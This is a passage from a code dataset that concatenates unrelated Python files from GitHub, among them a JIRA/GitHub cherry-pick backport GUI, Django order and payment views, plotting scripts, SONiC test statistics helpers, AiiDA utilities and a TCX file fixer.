from_account.to_ref()\n\n transfer.save(qb=self.qb_client)\n\n def test_update(self):\n credit_card_payment = CreditCardPayment.all(max_results=1, qb=self.qb_client)[0]\n credit_card_payment.Amount += 1\n credit_card_payment.save(qb=self.qb_client)\n\n query_credit_card_payment = CreditCardPayment.get(credit_card_payment.Id, qb=self.qb_client)\n\n self.assertEqual(query_credit_card_payment.Amount, credit_card_payment.Amount)\n","repo_name":"ej2/python-quickbooks","sub_path":"tests/integration/test_creditcardpayment_entity.py","file_name":"test_creditcardpayment_entity.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":353,"dataset":"github-code","pt":"51"} +{"seq_id":"3908261924","text":"from dicts import SpyTestDict\n\n\ndef port_stats_init(stats=None):\n stats = stats or SpyTestDict()\n stats.clear()\n stats.framesSent = 0\n stats.bytesSent = 0\n stats.framesReceived = 0\n stats.bytesReceived = 0\n stats.oversizeFramesReceived = 0\n stats.userDefinedStat1 = 0\n stats.userDefinedStat2 = 0\n stats.captureFilter = 0\n return stats\n\n\ndef dhcpc_stats_aggregate_init(port_name):\n res = SpyTestDict()\n res.port_name = port_name\n res.offer_rx_count = 0\n res.success_percentage = 0\n res.release_tx_count = 0\n res.setup_success = 0\n res.ack_rx_count = 0\n res.rx = SpyTestDict()\n res.rx.force_renew = 0\n res.enabled_interfaces = 0\n res.currently_idle = 0\n res.addr_discovered = 0\n res.teardown_initiated = 0\n res.teardown_success = 0\n res.total_failed = 0\n res.request_tx_count = 0\n res.discover_tx_count = 0\n res.currently_attempting = 0\n res.nak_rx_count = 0\n res.sessions_total = 0\n res.sessions_not_started = 0\n res.setup_fail = 0\n res.total_attempted = 0\n res.avgerage_teardown_rate = 0\n res.setup_initiated = 0\n res.currently_bound = 0\n res.teardown_failed = 0\n res.declines_tx_count = 0\n res.average_setup_time = 0\n return res\n\n\ndef dhcpc_stats_session_init(handle):\n res = SpyTestDict()\n res.lease_time = 3600\n res.address = \"\"\n res.device_group = \"\"\n res.port_name = handle\n res.protocol = \"\"\n res.offer_rx_count = 1\n res.information = \"none\"\n res.release_tx_count = 0\n res[\"discover/rapid_commit_tx\"] = 0\n res.ack_rx_count = 1\n res.rx = SpyTestDict()\n res.rx.force_renew = 0\n res.gateway = \"\"\n res.ip_addr = \"0.0.0.0\"\n res.Address = \"\"\n res.device_id = 0\n res.status = \"\"\n res.request_tx_count = 1\n res.discover_tx_count = 1\n res.lease_establishment_time = 12\n res[\"ack/rapid_commit_rx\"] = 0\n res.nak_rx_count = 0\n res.topology = \"\"\n res[\"lease/rapid_commit\"] = \"\"\n res.Gateway = \"\"\n res.Prefix = 24\n res.declines_tx_count = 0\n return res\n\n\ndef dhcps_stats_aggregate_init(port_name):\n res = SpyTestDict()\n res.port_name = port_name\n res.rx = SpyTestDict()\n res.rx.solicit = 0\n res.rx.confirm = 0\n res.rx.renew = 0\n res.rx.rebind = 0\n res.rx.request = 0\n res.rx.decline = 0\n res.rx.release = 0\n res.rx.inform = 0\n res.rx.relay_forward = 0\n res.rx.relay_reply = 0\n res.tx = SpyTestDict()\n res.tx.advertisement = 0\n res.tx.reply = 0\n res.total_addresses_allocated = 0\n res.total_addresses_renewed = 0\n res.current_addresses_allocated = 0\n res.total_prefixes_allocated = 0\n res.total_prefixes_renewed = 0\n res.current_prefixes_allocated = 0\n res.reconfigure_tx = 0\n res.sessions_up = 0\n res.sessions_down = 0\n res.sessions_not_started = 0\n res.session_total = 0\n res.nak_sent = 0\n res.solicits_ignored = 0\n return res\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"spytest/spytest/tgen/scapy/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"41698019496","text":"import json\nimport os\nimport re\n\nfrom github import Github, GithubException\nfrom jira import JIRA, JIRAError\n\nimport git as g\nfrom requests.exceptions import MissingSchema\n\nimport JIRAUtils\nfrom GUI import GUI\n\n\nclass MainController:\n def __init__(self):\n # - - - - - - - - - - - - - - - - - - - - -\n # JIRA Credentials\n self.jira_url = None\n self.jira_username = None\n self.jira_password = None\n\n # - - - - - - - - - - - - - - - - - - - - -\n # GitHub Credential\n self.github_username = None\n self.github_password = None\n\n # - - - - - - - - - - - - - - - - - - - - -\n # Backport Fields\n self.service_pack = None\n self.assignee = None\n self.base_folder = None\n\n # - - - - - - - - - - - - - - - - - - - - -\n # Merge Masters\n self.master1 = None\n self.master2 = None\n\n self.jira_connection = None\n self.github_connection = None\n self.backports = None\n\n # Create the entire GUI program\n self.gui = GUI(self)\n\n # Start the GUI event loop\n self.gui.window.mainloop()\n\n # Get SP cases for a given assignee and service pack.\n def get_sp_cases(self):\n self.gui.clear_logs()\n self.jira_url = self.gui.jira_url_input.get().strip()\n self.jira_username = self.gui.jira_user_input.get().strip()\n self.jira_password = self.gui.jira_password_input.get()\n self.service_pack = self.gui.service_pack_input.get().strip()\n self.assignee = self.gui.assignee_input.get().strip()\n\n if self.assignee:\n self.gui.log_info(\"Getting \" + self.assignee + \"'s SP cases for \" + self.service_pack + \"...\")\n else:\n self.gui.log_info(\"Getting SP cases for \" + self.service_pack + \"...\")\n\n # Connect to JIRA.\n try:\n self.gui.log_info(\"Connecting to JIRA...\")\n self.jira_connection = JIRA(server=self.jira_url, basic_auth=(self.jira_username, self.jira_password))\n except MissingSchema as me:\n self.gui.log_error(\"Unable to connect to JIRA: \" + str(me))\n return\n except JIRAError as je:\n self.gui.log_error(\"Unable to connect to JIRA: \" + je.text)\n return\n\n # Get Open and In Progress SP cases.\n try:\n sp_cases = JIRAUtils.get_sp_cases(self.jira_connection, self.service_pack, self.assignee)\n except JIRAError as je:\n self.gui.log_error(\"Unable to fetch SP Cases: \" + je.text)\n return\n\n # Update list of SP cases to be backported.\n self.gui.update_sp_list(sp_cases)\n self.gui.log_info(str(len(sp_cases)) + \" SP cases added.\")\n\n # Backport the selected SP cases.\n def backport(self):\n self.gui.clear_logs()\n self.gui.log_info(\"Starting to Backport...\")\n\n # Connect to GitHub.\n self.github_username = self.gui.github_user_input.get().strip()\n self.github_password = self.gui.github_password_input.get()\n try:\n self.github_connection = Github(self.github_username, self.github_password)\n me = self.github_connection.get_user(self.github_username)\n except GithubException as ge:\n self.gui.log_error(\"Unable to connect to GitHub: \" + ge.data['message'])\n self.gui.log_info(\"Done!\")\n return\n\n self.base_folder = self.gui.base_folder_input.get().strip()\n\n # Go through all SP cases\n sp_keys = [sp.split(' ')[0].replace('[', '').replace(']', '') for sp in self.gui.backports_listbox.get()]\n for sp_key in sp_keys:\n\n # Apply the Begin Work transition for the SP case.\n issue = self.jira_connection.issue(sp_key)\n self.jira_connection.assign_issue(issue, self.jira_username)\n if issue.fields.status.name == 'Open':\n self.jira_connection.transition_issue(issue.key, '11')\n\n # Get data from the JIRA Developer plugin.\n # Get Base Bug commits.\n self.gui.log_info(\"Backporting \" + sp_key + \"!\")\n base_bug = JIRAUtils.get_base_bug(self.jira_connection, sp_key)\n raw_data = JIRAUtils.get_data(self.jira_connection, base_bug)\n repositories = raw_data['detail'][0]['repositories']\n rep_names = [rep['name'] for rep in repositories]\n\n # Search for missing commits.\n # Find \"PR: \" patterns in JIRA case comments.\n jira_comments = [[re.search(r'(?<=PR:).*', body).group(0) for body in\n comment.body.encode(\"ascii\", errors=\"ignore\").decode().replace(\"\\r\\n\", \"\\n\").replace(\"\\r\", \"\\n\").split('\\n') if\n re.search(r'(?<=PR:).*', body) is not None] for comment in\n self.jira_connection.issue(base_bug.key).fields.comment.comments]\n links_in_comments = [item.strip() for sublist in jira_comments for item in sublist]\n\n # Check if there are missing commits in JIRA Developer plugin.\n for rep_name in rep_names:\n for not_missing_link in links_in_comments:\n # Commits are on JIRA Developer Plugin.\n if rep_name in not_missing_link:\n break\n\n # Commits are missing\n upstream_repo = me.get_repo(rep_name).parent\n try:\n pr = upstream_repo.get_pull(not_missing_link.split('/')[-1])\n except:\n continue\n for commit in pr.get_commits().get_page(0):\n rep_name = commit.html_url.split('/')[4]\n sha = commit.html_url.split('/')[-1]\n repositories.append({'name': rep_name,\n 'commits': [\n {'message': \"Missing Commit\", 'id': sha, 'url': commit.html_url,\n 'authorTimestamp': 1}]})\n if not rep_names:\n for missing_link in links_in_comments:\n # All commits are missing\n rep_name = missing_link.split('/')[-3]\n pr_nr = missing_link.split('/')[-1]\n pr_nr = int(''.join([i for i in pr_nr if i.isdigit()]))\n\n upstream_repo = me.get_repo(rep_name).parent\n try:\n pr = upstream_repo.get_pull(pr_nr)\n except:\n continue\n for commit in pr.get_commits().get_page(0):\n rep_name = commit.html_url.split('/')[4]\n sha = commit.html_url.split('/')[-1]\n repositories.append({'name': rep_name,\n 'commits': [\n {'message': \"Missing Commit\", 'id': sha, 'url': commit.html_url,\n 'authorTimestamp': 1}]})\n\n # Initialize JIRA comment.\n jira_comment = \"*Attention: This is the outcome of an automated process!*\"\n jira_comment += \"\\nPRs:\"\n\n # Go through all repositories.\n for repository in repositories:\n has_merge_conflicts = False\n self.gui.log_info(\"Creating the \" + sp_key + \" branch in \" + repository['name'] + \".\")\n\n # Check if we have the repository in place.\n repo_path = os.path.join(os.path.normpath(self.base_folder), repository['name'])\n if os.path.exists(repo_path):\n repo = g.Repo.init(repo_path)\n else:\n self.gui.log_error(\"Couldn't find repository in \" + repo_path)\n continue\n\n # Create SP branch.\n git = repo.git\n base_version_branch = self.service_pack.split('-')[1].split(' ')[0]\n sp_version_branch = self.service_pack.split(' ')[1].replace('(', '').replace(')', '')\n git.fetch('--all')\n try:\n # Make sure we don't have a SP branch on origin.\n git.push(\"origin\", '--delete', sp_key)\n except g.GitCommandError:\n pass\n finally:\n try:\n # Checkout to version branch.\n git.checkout(base_version_branch)\n except g.GitCommandError as gce:\n git.checkout('-b', base_version_branch, 'origin/' + base_version_branch)\n # Pull all version branch changes.\n git.pull('upstream', base_version_branch)\n\n try:\n # Make sure we don't have a SP branch locally.\n git.branch(\"-D\", sp_key)\n except g.GitCommandError:\n pass\n finally:\n git.checkout('-b', sp_key)\n\n # List of commits to be cherry-picked.\n commits = repository['commits']\n urls = []\n # Order commits by date, so we maintain the chronology of events.\n commits.sort(key=sort_by_timestamp)\n commit_message = '[' + sp_key + '] ' + self.jira_connection.issue(sp_key).fields.summary\n\n # Go through all commits.\n for commit in commits:\n # Don't cherry-pick merge PR commits.\n if not commit['message'].startswith(\"Merge pull request\"):\n # Cherry-pick base case commits.\n sha = commit['id']\n urls.append(commit['url'])\n self.gui.log_info(\"Cherry-picking \" + sha + \".\")\n try:\n git.cherry_pick(sha)\n except g.GitCommandError as gce:\n # Flag that we have merge conflicts, so we can signalize that on the jira comment later.\n has_merge_conflicts = True\n self.gui.log_error(\"Unable to cherry-pick '\" + sha + \"': \" + gce.stderr.strip())\n # Delete changes.\n git.reset('--hard')\n break\n # Rename commits with backport message.\n git.commit('--amend', '-m', commit_message)\n\n # Proceed with the backport, if we don't have conflicts\n base_pr = version_pr = None\n if has_merge_conflicts is False:\n try:\n # Push changes.\n self.gui.log_info(\"Pushing commits to \" + sp_key + \" branch.\")\n git.push(\"origin\", sp_key)\n except g.GitCommandError as gce:\n self.gui.log_error(\"Unable to push changes to origin \" + sp_key + \" branch: \" + gce.stderr.strip())\n git.checkout('master')\n git.branch(\"-D\", sp_key)\n self.gui.log_info(\"Done with \" + repository['name'] + \"!\")\n\n # Build PR message.\n self.master1 = self.gui.master1_input.get()\n self.master2 = self.gui.master2_input.get()\n pr_message = \"**Attention: This is the outcome of an automated process!**\"\n pr_message += \"\\nMerge Masters: \" + self.master1 + \" and \" + self.master2 + \"\\n\"\n pr_message += \"Cherry-picks:\\n\"\n for url in urls:\n pr_message += \"* \" + url + \"\\n\"\n\n # Build and send Pull Request.\n self.gui.log_info(\"Opening PRs for \" + sp_key + \".\")\n upstream_repo = me.get_repo(repository['name']).parent\n\n # For version branch\n try:\n upstream_repo.get_branch(base_version_branch)\n base_pr = upstream_repo.create_pull(commit_message, pr_message, base_version_branch,\n '{}:{}'.format(self.github_username, sp_key), True)\n except GithubException as ge:\n if ge.status == 422:\n self.gui.log_error(\n \"Unable to submit PR for \" + sp_key + \" in \" + base_version_branch + \" branch: \" +\n ge.data['errors'][0]['message'])\n else:\n self.gui.log_error(\n \"Unable to submit PR for \" + sp_key + \" in \" + base_version_branch + \" branch: \" +\n ge.data['message'])\n else:\n self.gui.log_info(\"Opened Pull Request in \" + base_version_branch + \" branch\")\n\n # For SP branch\n try:\n upstream_repo.get_branch(sp_version_branch)\n version_pr = upstream_repo.create_pull(commit_message, pr_message, sp_version_branch,\n '{}:{}'.format(self.github_username, sp_key), True)\n except GithubException as ge:\n if ge.status == 422:\n self.gui.log_error(\n \"Unable to submit PR for \" + sp_key + \" in \" + sp_version_branch + \" branch: \" +\n ge.data['errors'][0]['message'])\n else:\n self.gui.log_warn(\n \"Unable to submit PR for \" + sp_key + \" in \" + sp_version_branch + \" branch: \" +\n ge.data['message'])\n else:\n self.gui.log_info(\"Opened Pull Request in \" + sp_version_branch + \" branch\")\n\n # Delete branch and Move to next repository.\n self.gui.log_info(\"Deleting \" + sp_key + \" branch...\")\n git.checkout('master')\n git.branch(\"-D\", sp_key)\n self.gui.log_info(\"Done with \" + repository['name'] + \"!\")\n\n # Add PR links in the JIRA case\n self.gui.log_info(\"Adding PR links in \" + sp_key + \"...\")\n jira_comment += \"\\n* \" + repository['name'] + \":\"\n if base_pr:\n jira_comment += \"\\n** \" + base_version_branch + \": \" + base_pr.html_url\n elif has_merge_conflicts:\n jira_comment += \" There are conflicts that need to be manually treated.\"\n if version_pr:\n jira_comment += \"\\n** \" + sp_version_branch + \": \" + version_pr.html_url\n\n # Add pull-request-sent label\n issue.fields.labels.append(u\"pull-request-sent\")\n issue.update(fields={\"labels\": issue.fields.labels})\n\n # Move issue to block status\n self.jira_connection.transition_issue(sp_key, '61', comment=jira_comment)\n\n # Move to next SP case.\n self.gui.log_info(\"Done with \" + sp_key + \"!\")\n\n\ndef sort_by_timestamp(val):\n return val['authorTimestamp']\n\n\n# Start application\nMainController()\n","repo_name":"hv-leo/CherryPicker","sub_path":"MainController.py","file_name":"MainController.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42892860954","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef auto_save_metric_plots(df, time_step, rolling_over,lr,opt,seed):\n for i in range(len(df)):\n df[i] = df[i].apply(pd.to_numeric, errors='coerce')\n df[i] = df[i].fillna(0)\n ROLLING_OVER = rolling_over # per week\n\n # time=df['time'].max()/ROLLING_OVER\n time = min([d['time'].max() for d in df]) / 60\n tmin=0\n tmax=16\n # time = 100 * 6\n # df_pass[df_pass[[\"num_matches\", \"pass_arrivals\", \"longwait_pass\", \"served_pass\"]]<-1000]=0\n\n labels=[]\n\n\n colors=[]\n for l,o,s in zip(lr,opt,seed):\n print(l,o)\n if o>0:\n if abs(s-12000)<100:\n labels.append('inf')\n colors.append('g')\n elif s//1000>=10:\n labels.append('DRDQN-{}'.format(o))\n colors.append('r')\n elif s//1000==25:\n labels.append('1-DRDQN-{}'.format(o))\n colors.append('k')\n elif s//1000==22:\n labels.append('SDRDQN-{}'.format(o))\n colors.append('g')\n else:\n labels.append('0 option')\n colors.append('b')\n diff_label=['total_reward']#['average_idle_time']\n [d.rename(columns={'average_idle_time':'total_reward'},inplace=True) for d in df]\n for d in df:\n d['removed_pass']+=d['served_pass']\n plot_labels=['num_idle','longwait_pass','num_serving','num_assigned','num_cruising','total_reward','removed_pass','num_matches']\n fig, axes = plt.subplots(nrows=len(plot_labels), ncols=1, figsize=(10, 6*len(plot_labels)))\n axe = axes.ravel()\n\n\n for d,label,color in zip(df,labels,colors):\n ax_id = 0\n for id, col in enumerate(d.columns.tolist()[1:]):\n # v=moving_average(d[\"%s\" % col],rolling_over)\n if col in diff_label:\n diff_v=diff_value(d[\"%s\" % col].to_numpy(),1440)\n diff_v= diff_v [:tmax*rolling_over]\n v=group_average(diff_v,rolling_over)\n elif col in plot_labels:\n v=group_average(d[\"%s\" % col].to_numpy()[:tmax*rolling_over],rolling_over)\n else:\n continue\n\n v,upper,lower=moving_average(v,1)\n axe[ax_id].plot(v,'-.*', label=label,lw=0.5,ms=2,color=color)\n axe[ax_id].fill_between(np.arange(len(v)), lower, upper ,alpha=.1)\n #d[\"%s\" % col].rolling(window=rolling_over).mean()[:-1].plot(ax=axe[ax_id], style='-.', label=label)\n # d[\"%s\" % col].groupby(d.index // ROLLING_OVER).mean()[:-1].plot(ax=axe[ax_id], style='-.', label=label)\n axe[ax_id].set_ylabel(col)\n axe[ax_id].set_title(col)\n axe[ax_id].set_xlabel('Episode')\n axe[ax_id].set_xlim([tmin-1, tmax+1])\n axe[ax_id].legend(loc=0, prop={'size': 6})\n ax_id+=1\n\n # train_df = pd.DataFrame(train_name)\n\n plt.savefig('cnn_results.pdf')\n\n\ndef moving_average(x, w):\n #return np.convolve(x, np.ones(w), 'valid') / w\n return np.array([np.mean(x[i:i+w]) for i in range(len(x))]),np.array([np.percentile(x[i:i+w],75) for i in range(len(x))]),np.array([np.percentile(x[i:i+w],25) for i in range(len(x))])\n\ndef group_average(x,w):\n # return np.array([np.mean(x[i + w-1]) for i in range(0, len(x)-w, w)])\n return np.array([np.mean(x[i:i+w]) for i in range(0,len(x)-w,w)])\n\ndef diff_value(x,epi_len):\n vals=[]\n for i in range(0,len(x),epi_len):\n v=np.diff(x[i:i+epi_len])\n v=[0]+list(v)\n vals+=v\n\n return vals\n\nif __name__ == \"__main__\":\n df=[]\n\n # options=[1]\n # lr='0.0001'\n # df=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n\n # options=[3]\n # lr='0.001'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n #\n # options=[0]\n # lr='0.001'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n \n # # options=[1]\n # # lr='0.00012'\n # # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n # options=[0]\n # lr='0.0012'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n\n # options=[1]\n # lr='0.0011'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n #\n # options=[0]\n # lr='0.000149'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n\n\n tseed=[12200,12201,12000,12001,12002,12003,12004]#,12002,12003,12004,12000]\n tlearning_rate=['0.005' for _ in range(len(tseed))]\n toptions=[3 for _ in range(len(tseed))]\n # tseed=[12100,11201,19600]#,12002,12003,12004,12000]\n # tlearning_rate=['0.005' for _ in range(len(tseed))]\n # toptions=[3,0,3]\n\n # tseed1=[800+i for i in range(3)]\n # learning_rate+=['0.001' for _ in range(len(tseed1))]\n # options+=[3 for _ in range(len(tseed1))]\n #\n # # seed+=tseed\n # seed+=tseed1New Folder\n\n\n options=[];seed=[];learning_rate=[]\n for option,lr,s in zip(toptions,tlearning_rate,tseed):\n try:\n print(option,lr,s)\n df+=[pd.read_csv('../logs/test_results/parsed_results_{}_{}_nc_{}.csv'.format(option,lr,s))]\n options.append(option)\n learning_rate.append(lr)\n seed.append(s)\n except:\n continue\n\n\n # learning_rate+=['0.000145','0.000145']\n # options+=[1]\n #\n # for option,lr in zip(options,learning_rate):\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(option,lr))]\n\n # #\n # options=[1]\n # lr='0.00015'\n # df+=[pd.read_csv('../logs/parsed_results_{}_{}_nc.csv'.format(i,lr)) for i in options]\n # #\n auto_save_metric_plots(df, 1, 1440,learning_rate,options,seed)\n","repo_name":"sguo28/DROP_Simulator","sub_path":"code/tools/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"22416648205","text":"from django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom carts.models import Cart, CartItem\nfrom accounts.models import ShippingAddress\nfrom .models import Order, OrderItem, Payment\nfrom django.contrib.auth.decorators import login_required\nimport json\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.template.loader import render_to_string\nfrom carts.views import getCurrentCart\nfrom django.core.mail import EmailMessage\n# Create your views here.\n\ndef payment(request):\n \n user = request.user\n body = json.loads(request.body)\n order = Order.objects.get(user=user, is_ordered=False, order_number=body['orderID'] )\n \n #store transcations data inside payment model\n\n payment = Payment(\n user = user,\n payment_id=body['transID'],\n payment_method = body['payment_method'],\n amount = order.order_total,\n status = body['status'],\n )\n payment.save()\n order.payment = payment\n order.is_ordered = True\n order.save()\n \n for item in OrderItem.objects.all().filter(order=order):\n item.ordered = True\n item.save()\n\n #reduce stock\n\n #clear cart\n cart = getCurrentCart(request)\n CartItem.objects.filter(cart=cart).delete()\n \n #successful purchase email\n email = user.email\n current_site = get_current_site(request)\n mail_subject = \"Thank you for your purchase. Your order has been completed.\"\n message = render_to_string(\"orders/order_received_email.html\", {\n 'user':user,\n 'domain':current_site,\n 'order': order,\n })\n send_email = EmailMessage(subject=mail_subject,body=message,to=[email])\n send_email.send()\n \n data = {\n 'order_number': order.order_number,\n 'transID': payment.payment_id,\n }\n\n return JsonResponse(data)\n\n@login_required(login_url='login')\ndef place_order(request, order):\n\n cart_id,shipping_address_id = order.split('-')\n order_user = request.user\n order_cart = Cart.objects.get(id=cart_id)\n order_shipping_address = ShippingAddress.objects.get(id=shipping_address_id)\n new_order = Order(\n user = order_user,\n shipping_address=order_shipping_address,\n order_total=0, \n )\n new_order.save()\n new_order.generate_order_number()\n \n cart_items = CartItem.objects.all().filter(cart=order_cart)\n total = 0\n\n for item in cart_items:\n total += item.product.price*item.quantity\n\n order_item = OrderItem(\n order = new_order,\n product = item.product,\n quantity = item.quantity,\n color = item.color,\n size = item.size,\n condition = item.condition,\n )\n order_item.save()\n \n new_order.order_total = total\n new_order.save()\n \n order_items = OrderItem.objects.all().filter(order=new_order)\n context = {\n 'order':new_order,\n 'order_items': order_items,\n }\n return render(request, 'orders/payment.html', context)\n\ndef order_complete(request):\n\n order_number = request.GET.get('order_number')\n transID = request.GET.get('payment_id')\n\n try:\n order = Order.objects.get(order_number = order_number, is_ordered=True)\n order_items = OrderItem.objects.filter(order_id=order.id)\n payment = Payment.objects.get(payment_id=transID)\n shipping_address = order.shipping_address\n context = {\n 'order':order,\n 'order_items': order_items,\n 'payment': payment,\n 'shipping_address': shipping_address,\n }\n \n return render(request, 'orders/order_complete.html', context)\n\n except (Payment.DoesNotExist, Order.DoesNotExist):\n return redirect('home')","repo_name":"HerbCyor/ecommerce-example","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36271729971","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\ndef readme():\n with open('README.md') as f:\n README = f.read()\n return README\n\nVERSION = '1.0.4'\nDESCRIPTION = '🔍 Experimental DataFrame, statistics and analysis library for Python'\n\nsetup(\n name=\"ickle\",\n version=VERSION,\n author=\"Karishma Shukla\",\n author_email=\"karishmashuklaa@gmail.com\",\n url=\"https://github.com/karishmashuklaa/ickle\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description= readme(),\n packages=find_packages(),\n install_requires=['numpy', 'pytest'],\n keywords=['data-analysis', 'numpy', 'data', 'python', 'library', 'pandas', 'ickle', 'datascience'],\n license=\"MIT\",\n classifiers=[\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)","repo_name":"karishmashuklaa/ickle","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"51"} +{"seq_id":"73185571039","text":"import matplotlib.pyplot as plt\n\n# Define the parameter sizes and corresponding inference speeds\nparameter_sizes40x30 = [15083, 19539, 25235, 39843]\nparameter_sizes80x60 = [24407, 77139, 82835]\ninference_speeds40x30 = [700, 770, 910, 1200]\ninference_speeds80x60 = [1550, 2750, 2870]\n\n# Create a figure and axis\nfig, ax = plt.subplots(figsize=(10,5))\n\n\nplt.title('Inference speed vs Model size')\n# Plot the data\nax.plot(parameter_sizes40x30, inference_speeds40x30, label=\"Model_40x30\", marker=\"o\", linestyle='dashed')\nax.plot(parameter_sizes80x60, inference_speeds80x60, label=\"Model_80x60\", marker=\"o\", linestyle='dashed')\nax.grid(True)\n# Set the x and y axis labels\nax.set_xlabel('Parameter size')\nax.set_ylabel(u'Inference speed (\\u03bcs)')\nax.legend()\n\n\n# Show the plot\nplt.savefig(f'figure/Training/inferenceVsParams.svg')\nplt.show()\n","repo_name":"ntnu-arl/trace_paw","sub_path":"NeuralNetwork/plot_size_inference.py","file_name":"plot_size_inference.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"51"} +{"seq_id":"21499317863","text":"from django.shortcuts import render\nfrom .forms import PostForm\n\n\n# Create your views here.\ndef create_post(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n form.save()\n \n \n else:\n form = PostForm()\n\n return render(request,'create_post.html',{'form':form})\n\n\n\n\n \n","repo_name":"Mehyar-Farzat/Django-Blog2","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70579217438","text":"from aiida import orm\nfrom aiida.orm.utils import load_node\nfrom aiida.cmdline.utils.common import get_workchain_report\n\ndef report_exception(node, tab=''):\n print(tab + '{}'.format(('\\n' + tab + '- ').join(str(node.exception).split('\\n'))))\n\ndef report_failed(node, tab='', actions={}):\n ptr = failed_node = node\n while True:\n print(tab + '- {}<{}>: [{}] {}'.format(ptr.process_class.__name__, ptr.pk, ptr.exit_status, ptr.exit_message))\n if ptr.is_excepted:\n report_exception(ptr, tab=tab + ' ')\n if ptr.exit_status:\n failed_node = ptr\n try:\n ptr = ptr.called[0]\n except:\n break\n\n print(tab + 'Failed on {}'.format(failed_node.process_class.__name__))\n\n for typ, act in actions.items():\n if failed_node.process_class == typ:\n return act(failed_node)\n\ndef report_running(node):\n print(get_workchain_report(node, 'REPORT'))\n\n desc = list(node.called_descendants)\n if not len(desc):\n print('_____________________________________ NO CALLED DESC')\n return\n desc.sort(key=lambda x: x.pk)\n last = desc[-1]\n\n if not isinstance(last, orm.CalcJobNode):\n print('_____________________________________ NO CALCJOB')\n return\n\n try:\n remote = last.outputs.remote_folder\n except:\n print('_____________________________________ NO REMOTE YET!!!')\n return\n\n pc = last.process_class\n files = remote.listdir()\n\n if pc._DEFAULT_OUTPUT_FILE not in files:\n print('_____________________________________ IN QUEUE')\n else:\n print('_____________________________________ RUNNING')\n\ndef validate_node(node):\n if isinstance(node, int):\n res = load_node(node)\n elif isinstance(node, orm.Node):\n res = node\n else:\n raise ValueError('`pk` must be either a aiida.orm.Node or a pk to a node')\n\n return res","repo_name":"Crivella/mypyutils","sub_path":"src/mypyutils/aiida/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25286122316","text":"import sys\nimport os \nfrom parser.tcx import getMarker\nfrom classes.tcxclasses import Course\n\ncourse = Course();\n\n#read\nwith open(sys.argv[1], \"r\") as file_input:\n for line in file_input:\n marker = str(getMarker(line))\n if( marker != \"\" ):\n course.update(marker, line)\n\ncourse.finish();\n\nis_header = True;\n\nlap_count = 0;\nlap = course.getLap(0)\n\ntp_count = -1;\ntp = 0;\n\n#write\npath = sys.argv[1]\npath = os.path.normpath(path)\ntokens = path.split(os.sep)\ntokens[-1] = \"fixed_\"+tokens[-1]\ntokens[0] = \"/\"+tokens[0]\npath = os.path.join(*tokens)\n\nwith open(sys.argv[1], \"r\") as file_input:\n with open(path, \"w\") as file_output:\n for line in file_input: \n if is_header :\n if line.lstrip().startswith(\"\"):\n is_header = False\n tp_count = tp_count + 1\n tp = lap.getTrackPoint(tp_count);\n\n if line.lstrip().startswith(\"\"):\n line = \"\\t\\t\\t\\t\"+str(lap.tot_dist)+\"\\n\"\n \n if line.lstrip().startswith(\"\"):\n line = \"\\t\\t\\t\\t\"+str(lap.max_speed)+\"\\n\"\n \n else:\n if line.lstrip().startswith(\"\"):\n tp_count = tp_count + 1\n tp = lap.getTrackPoint(tp_count);\n\n if line.lstrip().startswith(\"\"): #TrackPoint\n course.dist += tp.speed\n line = \"\\t\\t\\t\\t\\t\\t\"+str(course.dist)+\"\\n\"\n \n if line.lstrip().startswith(\"\"):\n line = \"\\t\\t\\t\\t\\t\\t\\t\"+str(tp.speed)+\"\\n\"\n \n if line.lstrip().startswith(\"\"):\n line = \"\\t\\t\\t\\t\\t\\t\"+str(lap.avg_speed)+\"\\n\"\n \n 